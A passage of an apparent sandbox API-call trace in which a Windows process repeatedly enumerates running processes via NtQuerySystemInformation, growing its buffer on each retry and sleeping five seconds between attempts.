ResultLength=0x0) returned 0xc0000004 [0211.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.117] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.130] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.136] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.138] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.148] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.173] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.173] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.178] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.185] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.195] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.215] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.224] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.225] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.234] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.242] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.250] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.251] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.261] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.264] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.269] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.271] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.271] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.276] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.283] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.291] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.299] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.320] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.327] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.333] NtAllocateVirtualMemory (in: 